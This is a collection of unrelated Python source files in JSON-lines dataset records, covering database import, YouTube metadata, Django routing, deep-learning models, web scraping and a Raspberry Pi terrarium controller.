+{"seq_id":"10982292679","text":"from typing import final\nfrom cursor import CursorDelPool\nimport xml.etree.ElementTree as ET\nfrom logger_base import log\nfrom catalogo import Catalogo\n\nclass Conversor:\n\n\n _INSERTAR = 'INSERT INTO catalogo(common, botanical, zone, light, price, availability) VALUES(%s,%s,%s,%s,%s,%s)'\n _xml_data = None\n\n\n @classmethod\n def insertar(cls, planta):\n with CursorDelPool() as cursor:\n valores = (planta.find(\"COMMON\").text, planta.find(\"BOTANICAL\").text, planta.find(\"ZONE\").text, planta.find(\"LIGHT\").text, planta.find(\"PRICE\").text, planta.find(\"AVAILABILITY\").text)\n #print(valores)\n cursor.execute(cls._INSERTAR, valores)\n return cursor.rowcount\n\n @classmethod\n def leerxml(cls, xml_file):\n try:\n if xml_file.readable():\n cls._xml_data = ET.fromstring(xml_file.read())\n lista_plantas = cls._xml_data.findall('PLANT')\n for planta in lista_plantas:\n cls.insertar(planta)\n log.debug('Datos insertados correctamente')\n else:\n log.debug(False)\n except Exception as e:\n log.debug(f'Se ha producido un error {e}')\n finally:\n xml_file.close()\n\n\nif __name__ == '__main__':\n\n ruta = str(input('Ruta de archivo a ingresar: '))\n archivo = open(ruta)\n conversor = Conversor.leerxml(archivo)\n\n","repo_name":"romerodeveloper/Conversor_Archivos","sub_path":"conversor_xml.py","file_name":"conversor_xml.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"16624564866","text":"tcs = int(input())\nfor tc in range(tcs):\n\tn = int(input())\n\tA = []\n\tC = []\n\tids = []\n\tfor _ in range(n):\n\t\tarr = input().split()\n\t\tcolor = arr[0]\n\t\tdurability = int(arr[1])\n\t\tid = int(arr[2])\n\t\tA.append((color, id))\n\t\tC.append((durability, id))\n\t\tids.append(id)\n\n\tA.sort()\n\tC.sort()\n\n\tres = 0\n\tfor i in range(n):\n\t\tif A[i][1] == C[i][1]:\n\t\t\tres += 1\n\t\n\tprint('Case #{}: {}'.format(tc + 1, res))","repo_name":"chungwwei/cp-qs","sub_path":"round_f_2022/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"26731788071","text":"from pytube import YouTube\nfrom datetime import datetime\nfrom mysql.connector.types import RowType\nimport time\nimport logging\nimport sys\nimport os\n\n\nsys.path.append(os.getcwd())\nfrom Models.DatabaseHandler import Database_Handler\nfrom Models.Logger import Extractio_Logger\n\n\n\nclass YouTube_Downloader:\n \"\"\"\n It will handle every operations related to YouTube.\n \"\"\"\n __uniform_resource_locator: str\n \"\"\"\n The uniform resource locator to be searched.\n \"\"\"\n __video: YouTube\n \"\"\"\n Core developer interface for pytube.\n \"\"\"\n __title: str\n \"\"\"\n The title of the video.\n \"\"\"\n __identifier: str\n \"\"\"\n The identifier of the video.\n \"\"\"\n __length: int\n \"\"\"\n The length of the video in seconds.\n \"\"\"\n __duration: str\n \"\"\"\n The duration of the video in the format of HH:mm:ss.\n \"\"\"\n __published_at: str | datetime | None\n \"\"\"\n The date at which the video has been published.\n \"\"\"\n __database_handler: Database_Handler\n \"\"\"\n It is the object relational mapper that will be used to\n simplify the process to entering queries.\n \"\"\"\n __author: str\n \"\"\"\n The author of the video/music.\n \"\"\"\n __media_identifier: int\n \"\"\"\n The media type for the system.\n \"\"\"\n __timestamp: str\n \"\"\"\n The timestamp at which the session has been created.\n \"\"\"\n __directory: str\n \"\"\"\n The directory of the media files.\n \"\"\"\n __logger: Extractio_Logger\n \"\"\"\n The logger that will all the action of the application.\n \"\"\"\n\n def __init__(self, uniform_resource_locator: str, media_identifier: int):\n \"\"\"\n Instantiating the class and launching the operations needed.\n\n Parameters:\n uniform_resource_locator: (string): The uniform resource locator to be searched.\n media_identifier: (int): The media type for the system.\n \"\"\"\n self.setLogger(Extractio_Logger())\n self.getLogger().setLogger(logging.getLogger(__name__))\n self.setDatabaseHandler(Database_Handler())\n self.setUniformResourceLocator(uniform_resource_locator)\n self.setMediaIdentifier(media_identifier)\n self.getLogger().inform(\"The Downloader has been initialized\")\n\n def getUniformResourceLocator(self) -> str:\n return self.__uniform_resource_locator\n\n def setUniformResourceLocator(self, uniform_resource_locator: str) -> None:\n self.__uniform_resource_locator = uniform_resource_locator\n\n def getVideo(self) -> YouTube:\n return self.__video\n\n def setVideo(self, video: YouTube) -> None:\n self.__video = video\n\n def getTitle(self) -> str:\n return self.__title\n\n def setTitle(self, title: str) -> None:\n self.__title = title\n\n def getIdentifier(self) -> str:\n return self.__identifier\n\n def setIdentifier(self, identifier: str) -> None:\n self.__identifier = identifier\n\n def getLength(self) -> int:\n return self.__length\n\n def setLength(self, length: int) -> None:\n self.__length = length\n\n def getDuration(self) -> str:\n return self.__duration\n\n def setDuration(self, duration: str) -> None:\n self.__duration = duration\n\n def getPublishedAt(self) -> str | datetime | None:\n return self.__published_at\n\n def setPublishedAt(self, published_at: str | datetime | None) -> None:\n self.__published_at = str(published_at)\n\n def getDatabaseHandler(self) -> Database_Handler:\n return self.__database_handler\n\n def setDatabaseHandler(self, database_handler: Database_Handler) -> None:\n self.__database_handler = database_handler\n\n def getAuthor(self) -> str:\n return self.__author\n\n def setAuthor(self, author: str) -> None:\n self.__author = author\n\n def getMediaIdentifier(self) -> int:\n return self.__media_identifier\n\n def setMediaIdentifier(self, media_identifier: int) -> None:\n self.__media_identifier = media_identifier\n\n def getTimestamp(self) -> str:\n return self.__timestamp\n\n def setTimestamp(self, timestamp: str) -> None:\n self.__timestamp = timestamp\n\n def getDirectory(self) -> str:\n return self.__directory\n\n def setDirectory(self, directory: str) -> None:\n self.__directory = directory\n\n def getLogger(self) -> Extractio_Logger:\n return self.__logger\n\n def setLogger(self, logger: Extractio_Logger) -> None:\n self.__logger = logger\n\n def retrieveIdentifier(self, identifier: str) -> str:\n \"\"\"\n Retrieving the identifier of the content in the condition\n that it is in a playlist.\n\n Parameters:\n identifier: (string): The ID of the content.\n\n Return:\n (string)\n \"\"\"\n if \"&\" in identifier:\n return identifier.rsplit(\"&\", 1)[0]\n else:\n return identifier\n\n def search(self) -> dict[str, str | int | None]:\n \"\"\"\n Searching for the video in YouTube.\n\n Return:\n (object)\n \"\"\"\n response: dict[str, str | int | None]\n audio_file: str | None\n video_file: str | None\n self.setVideo(YouTube(self.getUniformResourceLocator()))\n self.setIdentifier(self.getUniformResourceLocator())\n if \"youtube\" in self.getUniformResourceLocator():\n self.setIdentifier(\n self.retrieveIdentifier(\n self.getIdentifier().replace(\n \"https://www.youtube.com/watch?v=\",\n \"\"\n )\n )\n )\n else:\n self.setIdentifier(\n self.getIdentifier().replace(\n \"https://youtu.be/\",\n \"\"\n ).rsplit(\"?\")[0]\n )\n meta_data = self.getYouTube()\n if meta_data[\"status\"] == 200:\n self.setLength(int(meta_data[\"data\"][0][4])) # type: ignore\n self.setPublishedAt(str(meta_data[\"data\"][0][3])) # type: ignore\n self.setAuthor(str(meta_data[\"data\"][0][0])) # type: ignore\n self.setTitle(str(meta_data[\"data\"][0][1])) # type: ignore\n self.setDuration(\n time.strftime(\"%H:%M:%S\", time.gmtime(self.getLength()))\n )\n File_Location = self._getFileLocations(meta_data[\"data\"]) # type: ignore\n audio_file = File_Location[\"audio_file\"]\n video_file = File_Location[\"video_file\"]\n else:\n self.setLength(self.getVideo().length)\n self.setPublishedAt(self.getVideo().publish_date)\n self.setAuthor(self.getVideo().author)\n self.setTitle(self.getVideo().title)\n self.setDuration(\n time.strftime(\"%H:%M:%S\", time.gmtime(self.getLength()))\n )\n audio_file = None\n video_file = None\n self.postYouTube()\n response = {\n \"uniform_resource_locator\": self.getUniformResourceLocator(),\n \"author\": self.getAuthor(),\n \"title\": self.getTitle(),\n \"identifier\": self.getIdentifier(),\n \"author_channel\": self.getVideo().channel_url,\n \"views\": self.getVideo().views,\n \"published_at\": str(self.getPublishedAt()),\n \"thumbnail\": self.getVideo().thumbnail_url,\n \"duration\": self.getDuration(),\n \"audio_file\": audio_file,\n \"video_file\": video_file\n }\n return response\n\n def _getFileLocations(self, result_set: list[RowType]) -> dict[str, str | None]:\n \"\"\"\n Extracting the file locations on the application's directory.\n\n Parameters:\n result_set: (array): The data from the database server.\n\n Return:\n (string)\n \"\"\"\n response: dict[str, str | None]\n if len(list(result_set)) == 2:\n response = {\n \"audio_file\": str(result_set[0][5]),\n \"video_file\": str(result_set[1][5])\n }\n else:\n response = {\n \"audio_file\": None,\n \"video_file\": None\n }\n return response\n\n def getYouTube(self) -> dict[str, int | list[RowType] | str]:\n \"\"\"\n Retrieving the metadata from the YouTube table.\n\n Return:\n (object)\n \"\"\"\n response: dict[str, int | list[RowType] | str]\n filter_parameters = tuple([self.getIdentifier()])\n media = self.getDatabaseHandler().get_data(\n parameters=filter_parameters,\n table_name=\"YouTube\",\n join_condition=\"MediaFile ON MediaFile.YouTube = YouTube.identifier\",\n filter_condition=\"YouTube.identifier = %s\",\n column_names=\"author, title, YouTube.identifier, published_at, length, location\",\n sort_condition=\"MediaFile.identifier ASC\",\n limit_condition=2\n )\n self.setTimestamp(datetime.now().strftime(\"%Y-%m-%d - %H:%M:%S\"))\n self.getLogger().inform(\n f\"The media content has been retrieved from the database server!\\nContent Amount: {len(media)}\\nCurrent Media: {media}\"\n )\n if len(media) == 0:\n response = {\n 'status': 404,\n 'data': media,\n 'timestamp': self.getTimestamp()\n }\n else:\n response = {\n 'status': 200,\n 'data': media,\n 'timestamp': self.getTimestamp()\n }\n return response\n\n def postYouTube(self) -> None:\n \"\"\"\n Creating a record for the media with its data.\n\n Return:\n (void)\n \"\"\"\n data = (\n self.getIdentifier(),\n self.getLength(),\n self.getPublishedAt(),\n self.getAuthor(),\n self.getTitle(),\n self.getMediaIdentifier()\n )\n self.getLogger().inform(\n f\"Data to be inserted into the database server.\\nIdentifier: {self.getIdentifier()}\\nLength: {self.getLength()}\\nPublished At: {self.getPublishedAt()}\\nAuthor: {self.getAuthor()}\\nTitle: {self.getTitle()}\\nMedia's Identifier: {self.getMediaIdentifier()}\"\n )\n self.getDatabaseHandler().post_data(\n table=\"YouTube\",\n columns=\"identifier, length, published_at, author, title, Media\",\n values=\"%s, %s, %s, %s, %s, %s\",\n parameters=data\n )\n","repo_name":"DONALDBZR/ytd_web_app","sub_path":"Auto/Classes/YouTubeDownloader.py","file_name":"YouTubeDownloader.py","file_ext":"py","file_size_in_byte":10545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"37981257780","text":"# -*- coding: gb18030 -*-\n#\n# $Id: $\n\n\"\"\"\n\"\"\"\nfrom Function import Function\nfrom bwdebug import *\nimport BigWorld\nimport csconst\nimport csstatus\nimport csdefine\nimport utils\n\nclass FuncLeavePrison( Function ):\n\t\"\"\"\n\t离开监狱\n\t\"\"\"\n\tdef __init__( self, section ):\n\t\t\"\"\"\n\t\tparam1: CLASS_*\n\n\t\t@param param: 由实现类自己解释格式; param1 - param5\n\t\t@type param: pyDataSection\n\t\t\"\"\"\n\t\tself.param01 = section.readInt( \"param1\" ) # 小于某个pk值才显示选项\n\t\tself.spaceName = section.readString( \"param2\" )\n\t\tself.pos = None\n\t\tself.direction = None\n\t\t\n\t\tposition = section.readString( \"param3\" )\n\t\tpos = utils.vector3TypeConvert( position )\n\t\tif pos is None:\n\t\t\tERROR_MSG( \"Vector3 Type Error:%s Bad format '%s' in section param3 \" % ( self.__class__.__name__, position ) )\n\t\telse:\n\t\t\tself.pos = pos\n\t\t\n\t\tdirection = section.readString( \"param4\" )\n\t\tdir = utils.vector3TypeConvert( direction )\n\t\tif dir is None:\n\t\t\tERROR_MSG( \"Vector3 Type Error:%s Bad format '%s' in section param4 \" % ( self.__class__.__name__, direction ) )\n\t\telse:\n\t\t\tself.direction = dir\n\n\tdef do( self, player, talkEntity = None ):\n\t\t\"\"\"\n\t\t执行一个功能\n\n\t\t@param player: 玩家\n\t\t@type player: Entity\n\t\t@param talkEntity: 一个扩展的参数\n\t\t@type talkEntity: entity\n\t\t@return: None\n\t\t\"\"\"\n\t\tplayer.endGossip( talkEntity )\n\t\tif player.pkValue >= self.param01:\n\t\t\tplayer.statusMessage( csstatus.PRISON_LEAVE_VALID, self.param01 )\n\t\t\treturn\n\n\t\tplayer.setTemp( \"leavePrison\", True )\n\t\tplayer.gotoSpace( self.spaceName, self.pos, self.direction )\n\n\tdef valid( self, player, talkEntity = None ):\n\t\t\"\"\"\n\t\t检查一个功能是否可以使用\n\n\t\t@param player: 玩家\n\t\t@type player: Entity\n\t\t@param talkEntity: 一个扩展的参数\n\t\t@type talkEntity: entity\n\t\t@return: True/False\n\t\t@rtype:\tbool\n\t\t\"\"\"\n\t\treturn True\n\n\n\n#","repo_name":"mudsave/csol2_enities_45541","sub_path":"cell/Resource/FuncsModule/FuncLeavePrison.py","file_name":"FuncLeavePrison.py","file_ext":"py","file_size_in_byte":1763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"13715946004","text":"import sys\n\ninput = sys.stdin.readline\n\n\ndef sort_order(i):\n return (-i[1], i[2], -i[3], i[0])\n\n\nN = int(input().rstrip())\nstudents = [0] * N\nfor i in range(N):\n name, kor, eng, math = input().split()\n kor, eng, math = map(int, [kor, eng, math])\n students[i] = [name, kor, eng, math]\nstudents.sort(key=sort_order)\nfor student in students:\n print(student[0])\n","repo_name":"nnoobbaagguu/Algorithm","sub_path":"Baekjoon Online Judge/10825.py","file_name":"10825.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"71065842461","text":"from django.conf.urls import patterns, include, url\nfrom flights.views import Index, Detail, Contact, Filter, Notifications, SignIn, SignUp, SignOut\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.views.generic import TemplateView\nfrom django.contrib.auth.decorators import login_required\n\n\n# Uncomment the next two lines to enable the admin:\nfrom django.contrib import admin\nfrom flights.api import QPXResource, SliceResource\nfrom location.api import CityResource, CountryResource, CurrencyResource\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n url(r'^admin/', include(admin.site.urls)),\n url(r'^$', Index.as_view(), name='index'),\n url(r'^contact$', Contact.as_view(), name='contact'),\n url(r'^notifications$', Notifications.as_view(), name='notifications'),\n url(r'^(?P\\d+)/$', Detail.as_view(), name='detail'),\n url(r'^price/(?P\\d+)/$', Filter.as_view(), name='filter'),\n url(r'^signin/$', SignIn.as_view(), name='signin'),\n url(r'^signup/$', SignUp.as_view(), name='signup'),\n url(r'^price/(?P\\d+)/$', Filter.as_view(), name='filter'),\n url(r'^leaving-date/(?P[0-9\\-_]+)/$', Filter.as_view()),\n url(r'^city/(?P[A-z]+)/$', Filter.as_view()),\n url(r'^signout/$', SignOut.as_view()),\n url(r'^api/qpx/', include(QPXResource.urls())),\n url(r'^api/slices/', include(SliceResource.urls())),\n url(r'^api/currenies/', include(CurrencyResource.urls())),\n url(r'^api/countries/', include(CountryResource.urls())),\n url(r'^api/cities/', include(CityResource.urls())),\n url(r'^thanks',TemplateView.as_view(template_name='flights/generic.html'),name='thanks'),\n url(r'^account',login_required(TemplateView.as_view(template_name='flights/generic.html')),name='thanks'),\n\n ) + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n","repo_name":"colins44/passportfriday","sub_path":"passportfridays/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"17172138645","text":"#!/usr/bin/env python3\r\n# -*- coding:utf-8 -*-\r\n# Copyright (c) 2014-2021 Megvii Inc. All rights reserved.\r\n\r\nimport os\r\nimport random\r\n\r\nimport torch\r\nimport torch.distributed as dist\r\nimport torch.nn as nn\r\n\r\nfrom .base_exp import BaseExp\r\n\r\n\r\nclass Exp(BaseExp):\r\n def __init__(self):\r\n super().__init__()\r\n\r\n # ---------------- model config ---------------- #\r\n self.num_classes = 80\r\n self.depth = 1.00\r\n self.width = 1.00\r\n\r\n # ---------------- dataloader config ---------------- #\r\n # set worker to 4 for shorter dataloader init time\r\n self.data_num_workers = 4\r\n self.input_size = (640, 640)\r\n # Actual multiscale ranges: [640-5*32, 640+5*32].\r\n # To disable multiscale training, set the\r\n # self.multiscale_range to 0.\r\n self.multiscale_range = 5\r\n # You can uncomment this line to specify a multiscale range\r\n # self.random_size = (14, 26)\r\n self.data_dir = None\r\n self.train_ann = \"instances_train2017.json\"\r\n self.val_ann = \"instances_val2017.json\"\r\n\r\n # --------------- transform config ----------------- #\r\n self.mosaic_prob = 1.0\r\n self.mixup_prob = 1.0\r\n self.hsv_prob = 1.0\r\n self.flip_prob = 0.5\r\n self.degrees = 10.0\r\n self.translate = 0.1\r\n self.mosaic_scale = (0.1, 2)\r\n self.mixup_scale = (0.5, 1.5)\r\n self.shear = 2.0\r\n self.perspective = 0.0\r\n self.enable_mixup = True\r\n\r\n # -------------- training config --------------------- #\r\n self.warmup_epochs = 5\r\n self.max_epoch = 300\r\n self.warmup_lr = 0\r\n self.basic_lr_per_img = 0.01 / 64.0\r\n self.scheduler = \"yoloxwarmcos\"\r\n self.no_aug_epochs = 15\r\n self.min_lr_ratio = 0.05\r\n self.ema = True\r\n\r\n self.weight_decay = 5e-4\r\n self.momentum = 0.9\r\n self.print_interval = 10\r\n self.eval_interval = 10\r\n self.exp_name = os.path.split(os.path.realpath(__file__))[1].split(\".\")[0]\r\n\r\n # ----------------- testing config ------------------ #\r\n self.test_size = (640, 640)\r\n self.test_conf = 0.01\r\n self.nmsthre = 0.65\r\n\r\n def get_model(self):\r\n from models import YOLOX, YOLOPAFPN, YOLOXHead\r\n\r\n def init_yolo(M):\r\n for m in M.modules():\r\n if isinstance(m, nn.BatchNorm2d):\r\n m.eps = 1e-3\r\n m.momentum = 0.03\r\n\r\n if getattr(self, \"model\", None) is None:\r\n in_channels = [256, 512, 1024]\r\n backbone = YOLOPAFPN(self.depth, self.width, in_channels=in_channels)\r\n head = YOLOXHead(self.num_classes, self.width, in_channels=in_channels)\r\n self.model = YOLOX(backbone, head)\r\n\r\n self.model.apply(init_yolo)\r\n self.model.head.initialize_biases(1e-2)\r\n return self.model\r\n","repo_name":"xiyie/yolox","sub_path":"test/exp/yolox_base.py","file_name":"yolox_base.py","file_ext":"py","file_size_in_byte":2924,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"39935198465","text":"n,m = [int(x) for x in input().split()]\n\nadj = [[] for _ in range(n + 1)]\nfor _ in range(m):\n\tu, v = [int(x) for x in input().split()]\n\tadj[u].append(v)\n\tadj[v].append(u)\n\n\n\nring = True\nfor x in adj[1:n+1]:\n\tif len(x) != 2:\n\t\tring = False\n\nlargest = len(adj[1])\nfor x in adj[1:n+1]:\n\tif len(x)>=largest:\n\t\tlargest = len(x)\nvisited = [False for i in range(n+1)]\nparent = [-1 for i in range(n+1)]\nstack = []\nstack.append(1)\nparent[1] = None\ncycle=False\n\nwhile (len(stack)):\n\ts = stack[-1]\n\tstack.pop()\n\tvisited[s] = True\n\tfor node in adj[s]:\n\t\tif (not visited[node]):\n\t\t\tstack.append(node)\n\t\t\tparent[node] = s\n\t\telif parent[s]!=node:\n\t\t\tcycle=True\n\nif ring and cycle:\n\tprint(\"ring topology\")\nelse:\n\tdistance = [-1 for _ in range(n + 1)]\n\tdistance[1] = 0\n\tshortest_path_tree_parent = [-1 for _ in range(n + 1)]\n\tqueue = [1]\n\tfor u in queue:\n\t\tfor v in adj[u]:\n\t\t\tif distance[v] == -1:\n\t\t\t\tdistance[v] = distance[u] + 1\n\t\t\t\tshortest_path_tree_parent[v] = u\n\t\t\t\tqueue.append(v)\n\t\n\tif largest==2:\n\t\tprint(\"bus topology\")\n\telse:\n\t\tif distance[n]<=2 and largest==n-1 and not cycle:\n\t\t\tprint(\"star topology\")\n\t\telse:\n\t\t\tprint(\"unknown topology\")\n\t\t\t\n\t\n\n","repo_name":"LamberlainMuli/CompetitiveProgramming","sub_path":"Progvar/AP CSCI 21 2022/Week 5/CF292B.py","file_name":"CF292B.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"3283889226","text":"import cv2\nimport torchvision.models as models\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport torch\nimport cv2\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torchvision.transforms as tt\n\nmodel_state = torch.load('models/facial_expression.pth')\nclass_labels = ['Angry', 'Disgust', 'Fear', 'Happy', 'Sad', 'Surprise', 'Neutral']\n#class_to_label = {0 :'Angry', 1 : 'Disgust', 2:'Fear', 3 :'Happy', 4:'Sad', 5:'Surprise', 6:'Neutral'}\nface_classifier = cv2.CascadeClassifier(\"models/haarcascade_frontalface_default.xml\")\n\nclass SeparableConv2d(nn.Module):\n\n def __init__(self, in_channels, out_channels, kernel_size=1, stride=1, padding=0, dilation=1, bias=False):\n super(SeparableConv2d, self).__init__()\n self.depthwise = nn.Conv2d(in_channels, in_channels, kernel_size, stride, padding, dilation, groups=in_channels,\n bias=bias)\n self.pointwise = nn.Conv2d(in_channels, out_channels, 1, 1, 0, 1, 1, bias=bias)\n\n def forward(self, x):\n x = self.depthwise(x)\n x = self.pointwise(x)\n return x\n\n\nclass ResidualBlock(nn.Module):\n\n def __init__(self, in_channeld, out_channels):\n super(ResidualBlock, self).__init__()\n\n self.residual_conv = nn.Conv2d(in_channels=in_channeld, out_channels=out_channels, kernel_size=1, stride=2,\n bias=False)\n self.residual_bn = nn.BatchNorm2d(out_channels, momentum=0.99, eps=1e-3)\n\n self.sepConv1 = SeparableConv2d(in_channels=in_channeld, out_channels=out_channels, kernel_size=3, bias=False,\n padding=1)\n self.bn1 = nn.BatchNorm2d(out_channels, momentum=0.99, eps=1e-3)\n self.relu = nn.ReLU()\n\n self.sepConv2 = SeparableConv2d(in_channels=out_channels, out_channels=out_channels, kernel_size=3, bias=False,\n padding=1)\n self.bn2 = nn.BatchNorm2d(out_channels, momentum=0.99, eps=1e-3)\n self.maxp = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)\n\n def forward(self, x):\n res = self.residual_conv(x)\n res = self.residual_bn(res)\n x = self.sepConv1(x)\n x = self.bn1(x)\n x = self.relu(x)\n x = self.sepConv2(x)\n x = self.bn2(x)\n x = self.maxp(x)\n return res + x\n\n\nclass FaceCnnModel(nn.Module):\n\n def __init__(self, in_channels, num_classes):\n super().__init__()\n\n self.conv1 = nn.Conv2d(in_channels=1, out_channels=8, kernel_size=3, stride=1, bias=False)\n self.bn1 = nn.BatchNorm2d(8, affine=True, momentum=0.99, eps=1e-3)\n self.relu1 = nn.ReLU()\n self.conv2 = nn.Conv2d(in_channels=8, out_channels=8, kernel_size=3, stride=1, bias=False)\n self.bn2 = nn.BatchNorm2d(8, momentum=0.99, eps=1e-3)\n self.relu2 = nn.ReLU()\n\n self.module1 = ResidualBlock(in_channeld=8, out_channels=16)\n self.module2 = ResidualBlock(in_channeld=16, out_channels=32)\n self.module3 = ResidualBlock(in_channeld=32, out_channels=64)\n self.module4 = ResidualBlock(in_channeld=64, out_channels=128)\n\n self.last_conv = nn.Conv2d(in_channels=128, out_channels=7, kernel_size=3, padding=1)\n self.avgp = nn.AdaptiveAvgPool2d((1, 1))\n\n def forward(self, input):\n x = input\n x = self.conv1(x)\n x = self.bn1(x)\n x = self.relu1(x)\n x = self.conv2(x)\n x = self.bn2(x)\n x = self.relu2(x)\n x = self.module1(x)\n x = self.module2(x)\n x = self.module3(x)\n x = self.module4(x)\n x = self.last_conv(x)\n x = self.avgp(x)\n x = x.view((x.shape[0], -1))\n return x\n\n\nmodel = FaceCnnModel(1,len(class_labels))\nmodel.load_state_dict(model_state)\n\ncap = cv2.VideoCapture(0)\n\nwhile True:\n # Grab a single frame of video\n ret, frame = cap.read()\n #frame = cv2.flip(frame, 1)\n labels = []\n gray = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)\n faces = face_classifier.detectMultiScale(gray, 1.3, 5)\n\n for (x,y,w,h) in faces:\n cv2.rectangle(frame,(x,y),(x+w,y+h),(255,0,0),2)\n roi_gray = gray[y:y+h, x:x+w]\n roi_gray = cv2.resize(roi_gray,(48, 48), interpolation=cv2.INTER_AREA)\n\n if np.sum([roi_gray])!= 0:\n roi = tt.functional.to_pil_image(roi_gray)\n roi = tt.functional.to_grayscale(roi)\n roi = tt.ToTensor()(roi).unsqueeze(0)\n\n # make a prediction on the ROI\n tensor = model(roi)\n pred = torch.max(tensor, dim=1)[1].tolist()\n label = class_labels[pred[0]]\n \n label_position = (x, y)\n cv2.putText(frame, label, label_position, cv2.FONT_HERSHEY_COMPLEX, 2, (0, 255, 0), 3)\n else:\n cv2.putText(frame, 'No Face Found', (20, 60), cv2.FONT_HERSHEY_COMPLEX, 2, (0, 255, 0), 3)\n \n cv2.imshow('Emotion Detector', frame)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"AayushBangroo/facialExpression","sub_path":"face.py","file_name":"face.py","file_ext":"py","file_size_in_byte":5023,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"6002301011","text":"# Need to install first (if some packages have not been installed previously)\n# >> python3 -m pip install beautifulsoup4\n# or\n# >> pip install beautifulsoup4\n# \n# >> python3 -m pip install lxml\n# or\n# >> pip install lxml\n\nfrom bs4 import BeautifulSoup\nimport csv\n\ntry:\n fileName = \"text_5_var_12\"\n with open(\"assets/data/5/\"+fileName, encoding=\"utf-8\", mode=\"r\") as htmlFile:\n reader = htmlFile.read()\n htmlParse = BeautifulSoup(reader, 'lxml') \n tableBody = htmlParse.find('table')\n tableRows = tableBody.find_all('tr')\n allData = []\n\n for row in tableRows:\n tableCols = row.find_all('td') or row.find_all('th')\n data = (tableCols[0].text, tableCols[1].text, tableCols[2].text, tableCols[3].text, tableCols[4].text)\n allData.append(data)\n \n with open(\"assets/result/5/\"+fileName+\"_result.csv\", 'w', newline='') as csvfile:\n writerCsv = csv.writer(csvfile, delimiter=',')\n for data in allData:\n writerCsv.writerow([data[0]] + [str(data[1])] + [data[2]] + [data[3]] + [data[4]])\n \nexcept Exception as e:\n print(e)","repo_name":"kuldii/my_first_pyton","sub_path":"lib/test5.py","file_name":"test5.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"5685397542","text":"from keras.models import Model\n\n\ndef lock_layers(model, indices):\n \"\"\"Locks layers on respective indices from indices array\"\"\"\n for i in indices:\n model.layers[i].trainable = False\n return model\n\n\ndef prepare_feature_extractor(model,\n crop_index,\n lock_index,\n input_shape):\n \"\"\"Crops model and locks layers from training\n Manipulates model config since it is only viable option besides rebuilding the whole model\n Receives:\n model - pretrained model\n crop_index - index of last layer in final model\n lock_index - index of last locked layer in final model\n input_shape - since model is convolutional, input could be freely changed\n Returns:\n new cropped model\n \"\"\"\n config = model.get_config()\n weights = model.get_weights()\n # Edit input layer\n config['layers'][0]['config']['batch_input_shape'] = (None, *input_shape)\n\n # Crop unnecessary layers\n assert crop_index < len(config['layers']), 'crop_index is out of layers list bounds'\n config['layers'] = config['layers'][:crop_index + 1]\n\n # Assign new model output\n config['layers'][-1]['config']['name'] = 'FeatureMap'\n config['output_layers'][0][0] = config['layers'][-1]['name']\n\n # Build cropped model from config and load weights\n model = Model.from_config(config)\n model.set_weights(weights)\n\n # Lock layers\n assert lock_index < len(config['layers']), 'lock_index is out of cropped layers list bounds'\n return lock_layers(model, list(range(lock_index + 1)))","repo_name":"bmstu-iu8-g1-2019-project/road-signs-recognition","sub_path":"sources/feature_extractor/processing.py","file_name":"processing.py","file_ext":"py","file_size_in_byte":1615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"5562962140","text":"import webiopi\nimport datetime\n#import Adafruit_DHT as dht\nimport sys\n\nGPIO = webiopi.GPIO\n\nVDHT = 6\nDth = 19\nPluz= 17\nPcascada = 27\nPlluvia = 12\nPcalefactor = 13\nPpeltier = 14\nTmin=22\nTmax=28\nHmin=100\nHmax=0\nHoraLuzOn = 9 # Turn Light ON at 08:00\nHoraLuzOff = 20 # Turn Light OFF at 18:00\nt = 1\nh = 2\nAUTO = True\nTemperaturaElevada = 0\n\n# setup function is automatically called at WebIOPi startup\ndef setup():\n # set the GPIO used by the light to output\n GPIO.setFunction(VDHT, GPIO.OUT) #pin 6 5V DHT\n GPIO.setFunction(Pluz, GPIO.OUT)\n GPIO.setFunction(Pcascada, GPIO.OUT)\n GPIO.setFunction(Plluvia, GPIO.OUT)\n GPIO.setFunction(Pcalefactor, GPIO.OUT)\n GPIO.setFunction(Ppeltier, GPIO.OUT)\n\n GPIO.digitalWrite(VDHT, GPIO.HIGH) #pin 6 5V DHT\n GPIO.digitalWrite(Pcascada, GPIO.LOW)\n GPIO.digitalWrite(Plluvia, GPIO.HIGH)\n GPIO.digitalWrite(Pcalefactor, GPIO.HIGH)\n GPIO.digitalWrite(Pluz, GPIO.HIGH)\n GPIO.digitalWrite(Ppeltier, GPIO.HIGH)\n\n\n hora = datetime.datetime.now()\n\n if ((hora.hour >= HoraLuzOn) and (hora.hour < HoraLuzOff)):\n GPIO.digitalWrite(Pluz, GPIO.HIGH)\n\n# loop 